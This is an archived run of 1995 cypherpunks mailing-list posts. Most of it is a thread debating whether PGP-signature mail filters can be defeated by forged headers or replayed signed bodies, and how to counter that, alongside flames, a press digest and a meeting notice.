          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Mon, 25 Dec 1995 23:20:54 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <901NgD5w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951225065654.26785C-100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:

> As I keep pointing out, pgp-signing the body is not enough.

	You're wrong.

	You can setup Procmail to detect if something is signed
	with PGP, and if it is, to run a script which determines
	the authenticity of the signature.  If the signature is
	not authentic, the message goes to /dev/null.  That way,
	even if Carol is using intercepted messages from Bob, Carol's
	messages won't be accepted or seen.

        xan

        jonathon
        grafolog@netcom.com


****************************************************************
	
	Opinions represented are not necessarilly mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 25 Dec 1995 20:56:50 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: [Rant] Flame threads and factual accuracy
In-Reply-To: <2.2b7.32.19951225030300.008f8cbc@mail.teleport.com>
Message-ID: <9512251230.AA25381@all.net>
MIME-Version: 1.0
Content-Type: text


Sorry to post this to the list.  I would normally only post it in
private to the sender, but since the sender has decided to speak without
listening I guess the only way to get the message back to them is by
indirect communication.  Will someone on the list please forward this
reply to the original sender on my behalf?

...
> Fred Cohen:
> 
> You have no respect for the freedom or opinions of others.  You expect the
> net to operate under your terms and under your rules.  You want people to be
> "responsible".

I know it's a lot to ask - being responsible - but I think it's the only way
cypherpunks will survive in the coming environment.

> From what I have read here that seems to mean "punishable".

With rights come responsibilities.  If you want the right of free speech, you
have to use it responsibly - otherwise, you will lose the right - and quite
possible lose it for me as well.

> I do not like some of flames I have seen, but I do not threated legal action
> against them. You have.  I have meet the keeper of the list.  He is a very
> nice guy and i would not want to see him go through hardship because of some
> whacko with a faschist control complex.

Since you don't know me, you have no idea of whether these statements
are true.  Put yourself in my place.  I posted no messages to the net
and yet I was publicly accused without any cause of doing things I did
not do by someone who knew that I didn't do them.  When I complained to
that person *in private* he published my personal mail to the list.  As
a result, you and others on the list are publicly calling me names like
a whacko with a faschist control complex.

It's not a matter of flames - it's a matter of intentionally and
maliciously perpetrating a falsehood about me in a manner and fashion
designed to damage my reputation.  That's different than voicing your
honest opinion and different than frivolous speech.  It's within your
freedom of speech to say a lot of senseless things - but it's not within
your freedom of speech to intentionally perpetrate damaging falsehoods
about other people.

Your name calling is so outrageous that nobody is likely to take you
seriously, and for that reason probably is not libelous - at least not
at the level you do it today, but what Perry did was something quite
different.  His statement could well be taken seriously - he has not
denied knowing that it was a falsehood - and it was clearly intended
to damage my reputation.

> Fred -- Go somewhere else.  I suggest you get together with Dan Gannon and
> his ilk.  I think you will find him more to your liking.  (Or maybe the
> $cientologists.  They are into sueing anyone who disagrees with them. I am
> sure they will help you start a list with your control fetishes in mind.
> Maybe you can borrow a few of their lawyers.)

I have a better idea.  I have as much right to be here or anywhere else
as anyone in the world.  Anyone who says I don't could easily be accused
of being a "whacko with a faschist control complex", but I won't make
such accusations in public against you.  It is you who can't stand the
heat of openly discussing one of the central issues of cypherpunks -
responsibility and freedom relating to speech.  The reason you can't
stand serious conversation is because your position is unsupportable.

> BTW, Fred has been killfiled on my mailreader. I am sick of listening to the
> twit.  To understand what an honor this is...  He is the only person I have
> killfiled on this or any mailinglist.

People who close their minds to communication and choose to make one-way
proclamations doom themseleves to ignorance.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 25 Dec 1995 21:26:56 +0800
To: cypherpunks@toad.com
Subject: Only accepting e-mail from known parties
In-Reply-To: <QQzvnv07234.199512242055@relay2.UU.NET>
Message-ID: <901NgD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


owner-cypherpunks@toad.com writes:
> Eric Murray wrote:
>
> | Where we're headed is mail filters with PGP imbedded (PGP 3 will
> | make this much easier) that check incoming mail for a valid signature
> | for certain PGP keyid/fingerprints and pass that mail along.
> | Other mail that doesn't match gets tossed into a 'junk' folder
> | or thrown away if you really don't want to talk to anyone that you
> | don't already know.
>
> I agree with the assesment of where we may be going, but the
> technology is available now.  (Marshall Rose uses it; if you want to
> get mail into his private mailbox, offer him some $ via imbedded FV
> authorizations in the mail, and it goes into his inbox.  If he thinks
> it was worth his time, he doesn't charge you.)
>
> Anyway, the code is defeintely available now.  The back end is a
> little kludgy, but it was needed for an auto ley retreival script.
> This could easily be hacked to include a +pubring=$people line.  The
> script gives you a keyid, which you can then use to filter on, ie:
<shell script>

This is much better than nothing. This would stop the e-mail being
sent to everyone who's ever posted to Usenet. I see a couple of attacks:

1. Alice only accepts signed e-mail from Bob. Carol receives a signed e-mail
from Bob to Carol, sends 10,000 e-mails to Alice (via sendmail) with From: bob,
same body+signature, possibly varying message-ids and subjects.

2. Alice only accepts signed e-mail from Bob. Carol, a rogue sysadmin,
intercepts an e-mail from Bob to Alice, sends 10,000 more copies of it to Alice
(via sendmail) with From: bob, possibly varying message-ids and subjects.

As I keep pointing out, pgp-signing the body is not enough.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Mon, 25 Dec 1995 23:51:41 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
Message-ID: <13060E503DA@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Dec 95 at 7:45, Dr. Dimitri Vulis wrote:

[much on a pgp based gateway filter for email]
: 
: This is much better than nothing. This would stop the e-mail being
: sent to everyone who's ever posted to Usenet. I see a couple of attacks:
: 
: 1. Alice only accepts signed e-mail from Bob. Carol receives a signed e-mail
: from Bob to Carol, sends 10,000 e-mails to Alice (via sendmail) with From: bob,
: same body+signature, possibly varying message-ids and subjects.
: 
: 2. Alice only accepts signed e-mail from Bob. Carol, a rogue sysadmin,
: intercepts an e-mail from Bob to Alice, sends 10,000 more copies of it to Alice
: (via sendmail) with From: bob, possibly varying message-ids and subjects.
: 
: As I keep pointing out, pgp-signing the body is not enough.
: 

	Keep checksums of signitures (or body text) for a week, duplicate 
messages are routed to /dev/null.

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
You are lost in a maze of twisty little standards, all
different.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 26 Dec 1995 01:35:48 +0800
To: grafolog@netcom.com (Jonathan Blake)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225065654.26785C-100000@netcom16>
Message-ID: <199512251710.JAA08899@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
> On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:
> 
> > As I keep pointing out, pgp-signing the body is not enough.
> 
> 	You're wrong.

He's right.

> 	You can setup Procmail to detect if something is signed
> 	with PGP, and if it is, to run a script which determines
> 	the authenticity of the signature.  If the signature is
> 	not authentic, the message goes to /dev/null.  That way,
> 	even if Carol is using intercepted messages from Bob, Carol's
> 	messages won't be accepted or seen.

Ok.  If I want to get my email ad for the Ronco turnip-twaddler past a filter
like that, all I need to do is to create a PGP key with
a user name that's the same as one that the victim already
receives.

i.e. if I know that joe@blort.com exchanges email with phred@none.net, then
I just create a PGP key with the name "phred@none.net", and sign
the turnip-twaddler ad with that.  It'd have a valid signature, and
one coming from Joe's friend phred.   Mail accepted.

In addition to checking for a valid signature, the filtering software
would have to also check the PGP key id of the key used.  It would
also need to make sure that there is ONLY PGP-signed content in the
mail.  Otherwise Mallet could grab an innocuous mail message that
Phred signed and included it at the bottom of the turnip-twaddler ad.
It wouldn't make sense (although that might be usual with Phred), but it'd
contain a valid signature from Phred, and therefore get the ad
past the filter.

I'm sure there's other caveats, these are just the ones I can think of now.



I wish all Cypherpunks a Merry Christmas.  I hope Santa brought you
all something nice, like a fast new stream cipher, a new key exchange
protocol, or maybe a note from the Fedz saying that ITAR has been lifted.
 

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 22:49:15 +0800
To: cypherpunks@toad.com
Subject: ROS_pig
Message-ID: <199512251432.JAA11244@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-25-95. NYPaper:

   "Fear Of Freedom: The urge to censor persists." Anthony
   Lewis column.

      The very essence of the on-line world is freedom. The
      effect of the "indecent" prohibition of the telecom bill
      will be to reduce all users of cyberspace to the level
      of children. That is exactly what Justice Felix
      Frankfurter found unconstitutional writing for the
      Supreme Court in 1957, about a Michigan law that banned
      sales to anyone of material unsuitable for children.
      "Surely," he wrote, "this is to burn the house to roast
      the pig."


   "Coming Soon to Computers Everywhere, a World's Fair." John
   Markoff.

      In an era when the Internet has become synonymous with
      commercialism and instant fortunes, Carl Malamud's
      commitment to public service has set him apart. Mr.
      Malamud maintains that there are still two ways to build
      the Internet. One is the high-stakes high-visibility
      route of initial public offerings in the stock market,
      the money-raising approach being pursued by people like
      Netscape Communication's founders, Jim Clark and Mark
      Andreeson. The other route, Mr. Malamud maintains, is by
      soliciting funds and building viable public works
      projects that benefit the common good.


   2 in 1: ROS_pig  (13k)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Dec 1995 02:00:27 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251710.JAA08899@slack.lne.com>
Message-ID: <Pine.SUN.3.91.951225091910.27577B-100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain



	Erik:

On Mon, 25 Dec 1995, Eric Murray wrote:

> > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:

> Ok.  If I want to get my email ad for the Ronco turnip-twaddler past a filter
> like that, all I need to do is to create a PGP key with
> a user name that's the same as one that the victim already
> receives.
> 
> i.e. if I know that joe@blort.com exchanges email with phred@none.net, then
> I just create a PGP key with the name "phred@none.net", and sign
> the turnip-twaddler ad with that.  It'd have a valid signature, and
> one coming from Joe's friend phred.   Mail accepted.

	But will the signature match that of phred@none.net's PGP
	key.  I doubt it.

> In addition to checking for a valid signature, the filtering software
> would have to also check the PGP key id of the key used.  It would

	To check a signature, you need the public key the signature 
	was created with.  You allready have phred@none.net's public
	key on your keyring.  If that key does not demonstrate an
	authentic signature for the messge, then the message is 
	a fake.  

	Now, if you assume that your keyring has been compromised,
	then you can also check the signatures of who signed the
	keys.  At a minimu, your signature should be on the authentic
	key.  If it is missing, then you can place the message in
	a "suspected to be forged bin", or just send it to dev/null,
	unread. 

> also need to make sure that there is ONLY PGP-signed content in the
> mail.  Otherwise Mallet could grab an innocuous mail message that

	I hadn't thought of that, but here is one solution.

	Run a perl script that automatically deletes everything 
	that is not signed by pgp, with the exception of the date,
	the sender, and the subject line.  

> I'm sure there's other caveats, these are just the ones I can think of now.

	Let's figure out some more threat models.  And how to counter
	them.  

	Man in the middle --- he has your public key, joe@none.net's
	public key, and access to both your pbulic ring, and 
	joe@none.net public ring.   I don't know know how to counter
	this one using filters with perl --- yet.

        xan

        jonathon
        grafolog@netcom.com


****************************************************************
	
	Opinions represented are not necessarilly mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Dec 1995 02:33:58 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <X8BogD7w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951225094550.27577E-100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain



	Dr Dimitri Vulis:

On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:

> Jonathan Blake <grafolog@netcom.com> writes:
> > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:
> >
> I'll be delighted if someone convinces me that I'm wrong about this.
> I may even start using PGP signatures. :)

	When I get the bugs out of the procmail script I'm
	writing, to accomplish this, I'll send it to you.

> I said, Carol can *forge* the RFC 822 header, so her e-mails look like they
> came from Bob, and use the body from Bob's authentic PGP-signed message.

	Strip out everything that is not header information, and is
	not signed with pgp. You could even strip out all header
	information, except for who sent the message.  That you need,
	so you know who to respond to.  

> The e-mail is sent by Carol, but the RFC 822 header says "From: Bob".
> If you think this is hard to accomplish, take a look, e.g., at the source

	Forged signatures are not that difficult to accomplish.

> The PGP-signed portion is copied verbatim from an authentic message.

	This is a good point.  

	However, won['t most messages have the name of the intended
	recipient inside the PGP signature lines?

	Regardless, you've stated a weakness that I hadn't realized
	existed.  

> Alice _may_ notice that the _Received:_ headers are weird, but this
> forgery will certainly pass through a script that checks signatures.

	I'll have to give this some thought.  Have the script
	match the from id, with the message id.  << Not sure 
	how I can do this one, yet.  >>

> That's because PGP only signed a portion of the body, not the important
> headers like "Date:", "To:", "Subject:", and "Newsgroups:", nor the .sig.

	The Header won't be signed by PGP.  That part I will concede.
	The signature might be signed by PGP, depending on what one is
	using to read & respond to email with.  With SLMR can sign 
	signatures. << Granted, it is for DOS, and is geared towards 
	FidoNet conferences.  And I had to right a batch file to call 
	the editor, then the program to attach the signature, then 
	sign the thing.  But the signature was included in the signed 
	part of the pgp message.  >>

        xan

        jonathon
        grafolog@netcom.com


****************************************************************
	
	Opinions represented are not necessarilly mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 26 Dec 1995 01:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225065654.26785C-100000@netcom16>
Message-ID: <X8BogD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Blake <grafolog@netcom.com> writes:
> On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:
>
> > As I keep pointing out, pgp-signing the body is not enough.
>
> 	You're wrong.

I'll be delighted if someone convinces me that I'm wrong about this.
I may even start using PGP signatures. :)

> 	You can setup Procmail to detect if something is signed
> 	with PGP, and if it is, to run a script which determines
> 	the authenticity of the signature.  If the signature is
> 	not authentic, the message goes to /dev/null.  That way,
> 	even if Carol is using intercepted messages from Bob, Carol's
> 	messages won't be accepted or seen.

Carol needn't put her real name in the "From:" line.  Much of the unsolicited
commercial junk e-mail comes from bogus addresses.

I said, Carol can *forge* the RFC 822 header, so her e-mails look like they
came from Bob, and use the body from Bob's authentic PGP-signed message.

For example, Bob may have once sent Carol an e-mail that looked like this:

-----------------------------------------------------------------------
From: Bob
To: Carol
Date: 25 Dec 1965
Subject: Carol, we're history
Message-ID: <111@bob>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

"Ask not what your country can do to you, but what you can do to your country"

-----------------------------------------------------------------------

Carol can *easily* forge an e-mail to Alice that looks like this:

-----------------------------------------------------------------------
From: Bob
To: Alice
Date: 25 Dec 1995
Subject: Alice, we're history
Message-ID: <222@bob>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

"Sex with Carol was the greatest sex I've ever had"

-----------------------------------------------------------------------

The e-mail is sent by Carol, but the RFC 822 header says "From: Bob".
If you think this is hard to accomplish, take a look, e.g., at the source
code the Lance Cotrell's mixmaster and see how it talks to sendmail.

The PGP-signed portion is copied verbatim from an authentic message.

Alice _may_ notice that the _Received:_ headers are weird, but this
forgery will certainly pass through a script that checks signatures.
E.g., this trick could be used to mailbomb someone with many copies
of the same authentic e-mail.

That's because PGP only signed a portion of the body, not the important
headers like "Date:", "To:", "Subject:", and "Newsgroups:", nor the .sig.

Happy holidays,

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 02:20:32 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <X8BogD7w165w@bwalk.dm.com>
Message-ID: <199512251754.MAA01460@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Dimitri Vulis wrote:

| I said, Carol can *forge* the RFC 822 header, so her e-mails look like they
| came from Bob, and use the body from Bob's authentic PGP-signed message.

	Yes, this is possible.  No, I'm not going to take the time to
write a fix now, but, we both know its not tough to prevent.

	Take the hash of the pgp signed message, use it to filter on.
I'll occaisonally add text outside a signature (literally, a
postscript), so filtering out everything outside the signed text is a
bad idea.  You might get a few spams, but not hundreds.  Its tough to
ensure that mail always has an envelope that matches the key.  I still
use a key that say adam@bwh.harvard.edu, but most of my mail is signed
with an adam@homeport.org key.

	Cryptography can't solve social problems.  It can, however,
transform them into tougher problems for the anti-social.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 02:28:37 +0800
To: grafolog@netcom.com (Jonathan Blake)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225091910.27577B-100000@netcom23>
Message-ID: <199512251804.NAA01482@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jonathan Blake wrote:

| > also need to make sure that there is ONLY PGP-signed content in the
| > mail.  Otherwise Mallet could grab an innocuous mail message that
[...]
| > I'm sure there's other caveats, these are just the ones I can think of now.
| 
| 	Let's figure out some more threat models.  And how to counter
| 	them.  
| 
| 	Man in the middle --- he has your public key, joe@none.net's
| 	public key, and access to both your pbulic ring, and 
| 	joe@none.net public ring.   I don't know know how to counter
| 	this one using filters with perl --- yet.

	The real threat model that Dimitri seems to be worried about
is spammers, so lets address them.

There are two types of spammers, commercial and personal.

	The commercial spammer wants to get messages into hundreds or
thousands of mail boxes.  The effort to do this, per mailbox, needs to
be very low, or they go for people with worse filters.

	The personal spammer is more difficult, since they seek
specifically to annoy you, and can thus be expected to expend more
effort.  They can possibly get a copy of each signed message that
comes to you, but of course, you can cache filter them.  A problem
occurs if they can get their spam to you before the legit message, in
which case you need to wade through tripe to get to the real message.

	The personal spammer is a social problem, and I recommend
using social methods to fix it.  An auto-responder that says "Please
grow up" might do the trick.




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 26 Dec 1995 07:49:12 +0800
To: cypherpunks@toad.com
Subject: Encryption Discrimination from Sun
Message-ID: <199512252216.OAA09495@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I was just browsing through the rules for the million dollar
contest just announced by Sun Microsystems to encourage the
writing of killer applets in Java, Sun's new architecture-
independent program format. 

The URL is http://javacontest.sun.com/rules/index.html in case
anyone is interested.

While reading the contest rules, I found the following one
particularly interesting...

   "No entries may include encryption as a feature
    or part of an applet."

This was made even more curious by the later revelation that
one of the criteria for judging entries was...

   "The applet should be able to transfer information from 
    one point to another, with no possibility of interception 
    or other interference during the process."

Doubtless the reason Sun nixed encryption is because this is an
international contest, and they did not want to deal with legal
hassles involving international borders and different laws in 
every country.    

Nonetheless, they seem to have missed an excellent opportunity
to encourage the migration of privacy software into the new 
realm they are creating. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 26 Dec 1995 04:06:04 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512251933.OAA14735@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


How about one-time electronic stamps. 
 
I generate a large-ish number of long-ish random numbers. 
 
I store these into a data base on my system. 
 
I send one e-stamp to all of the people I want to communicate with and vice
versa. 
 
Each person uses the e-stamp in the header or some other area of their
message to me easily accessible to my mail bot. 
 
My bot reads the e-stamp and then checks the data base to see if the stamp
is valid. 
 
If not, then /dev/null. If so, then: 
 
     a) send the message to me; 
     b) delete the used e-stamp from the data base; 
     c) send a confirmation of received message with a new e-stamp in it. 
 
Thoughts? (I see one problem with this but it should be able to be worked
out once the basic method is agreed to). 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 26 Dec 1995 04:16:04 +0800
To: alanh@infi.net
Subject: Re: bashing (fwd)
Message-ID: <9512251936.AA29575@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Allan, shut the hell up.
This thread is truely unnecessary, can we just let it die?

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 04:32:19 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251933.OAA14735@pipe8.nyc.pipeline.com>
Message-ID: <199512251953.OAA01614@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The basic problem is that (personal) spam is a social, not a
technical problem.  If someone wants to annoy you via the internet,
they can do so.  You can raise the cost of their annoying you, but you
need to be careful not to make it difficult to talk to you.

	Stamps are an annoying solution unless the stamp buys the
sender something that the sender wants (perhaps such as
pseudononymity).

	It would seem that only accepting signed mail, and caching the
hash of the signed part would work pretty well, and also not require
anything (other than a signature) from the remote end.  The cost of a
spam is the time to generate a new key pair.  (You probably need some
way to add new keys, for people to be able to say 'I'd like to talk to
you.')

Adam


| If not, then /dev/null. If so, then: 
|  
|      a) send the message to me; 
|      b) delete the used e-stamp from the data base; 
|      c) send a confirmation of received message with a new e-stamp in it. 
|  
| Thoughts? (I see one problem with this but it should be able to be worked
| out once the basic method is agreed to). 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 26 Dec 1995 04:43:36 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512252009.PAA18246@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 25, 1995 14:53:19, 'Adam Shostack <adam@lighthouse.homeport.org>'
wrote: 
 
 
>	The basic problem is that (personal) spam is a social, not a 
>technical problem.  If someone wants to annoy you via the internet, 
>they can do so.  You can raise the cost of their annoying you, but you 
>need to be careful not to make it difficult to talk to you. 
> 
 
I agree in many ways. On a personal level, I am far more interested in the
*social* are of this form of privacy. It is more a problem of the
data-hermit than privacy. And in a society increasingly generating
narcissistists, I see the problem getting worse. 
 
Negroponte of the MIT Media Lab can sing the praises of the personal
e-newspaper with personal filters to cut out everything uninteresting while
culling the world new feeds for desired information. 
 
I see this feeding into the narcissitism problem. E.G. 
 
Imagine two people who "feel" that members of the other gender are "only
interested in one thing." 
 
Each wakes up in the morning and looks at their personal e-paper. 
 
She reads nothing of particularly nasty rapes, serial rapists at large,
rapists who have been convicted, and rapists who an uncaring pro-male
system has let out to rape again (i.e. been found not guilty). 
 
He reads nothing of particularly nasty robberies of men by women, serial
robberies by prostitutes, female robbers who have been convicted, and
robbers who an uncaring pro-female system has let out to rob again. 
 
Both believe that their custom filtered feeds are the *real* events going
on in the world and are far more accurate than any non-customized news
feed. 
 
I hope nobody takes this as a generic attack on the privacy issues that the
list is devoted to. I am a great supporter of privacy and pro-privacy tek.
But I see myself as a realist on privacy issues, not as a privacy-utopian
or a privacy-dystopian. 
 
We live in a post-Faustian world. 
 
It is divided into two groups of people. First are those who understand the
post-Faustian character and devote themselves to getting used to it and
even having fun with the new opportunities while understanding that the new
world also generates new problems (like furthering data-narcicism). Second
are those classic-reactionary forces (from all parts of the political
spectrum) who whine about how the post-Faustian world is personally unfair
to them and how everybody in the world has a personal obligation to them to
move the world back to its pre-Faustian origins. 
 
--tallpaul 
 
PS to Tim May: I understand your posts on material that is off-topic. I
usually agree with your posts. But I see the issues I discussed above as
far more on topic (even if highly mediated) than, say, the ongoing
discourse on the differences between an Army Captain and a Navy Captain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 05:38:00 +0800
To: cypherpunks@toad.com
Subject: Future Scenarios for e$: The DCSB Forecast
Message-ID: <v02120d05ad04bfd9361e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

**************>>>>>>  Meeting Reminder: One week to go! <<<<<<***********
****>>>>>> Checks due to Shipwright *this* Saturday, December 30, 1995  <<<<<<**


                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                      Art Hutchinson and John Kelly
                Northeast Consulting Resources Inc., (NCRI)

             "Future Scenarios for e$: The DCSB Forecast"


                        Tuesday, January 2, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



I've been talking to Art Hutchinson last week, and it looks like we're in for a
treat.  This is going to be particularly useful, coming as it does at the
beginning of the new year. He and John Kelly are going to put our
prognostication skills through their paces with what amounts to a 90's version
of Delphi exercise, using us, a bunch of people who, if anyone, should have an
interesting take on where commerce on the internet is going in the next few
years. I'm psyched. Art and John are old pros at this kind of thing, so I expect
this is going to be great fun.

Since we're going to be doing something different besides listening to a speaker
this time, I'd like to suggest that we get there right at 12 noon to get
things started immediately, New Year's aldehyde toxcicity notwithstanding.
;-).

Instead of one big group around a table, we'll be sitting at smaller tables
with
a pile of future "events" to prognisticate about. Our opinions about the
likelihood about those events will be recorded by a "scribe" at each table, and
then posted for all to look at during/after lunch. The "events" are drawn
from a
giant database of these things that NCRI has acquired over the years, filtered
down to e$-relevance, plus some suggestions from the stuff we've discussed on
the dcsb list and at monthly meetings.


This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, January 2, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by *this*
Saturday, December 30 , or you won't be on the list for lunch. We're trying to
hold the line on advance registration this time, because the holiday makes for
considerable uncertainty in reservations. I will be sending confirmations early
this time, on Thursday, just to make sure.  Checks payable to anyone else but
The Harvard Club of Boston will have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 February    Fred Hapgood     Freelance Author
 March       Glenda Barnes    X.9 Electronic Commerce Security Group
 April       Donald Eastlake  CyberCash
 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
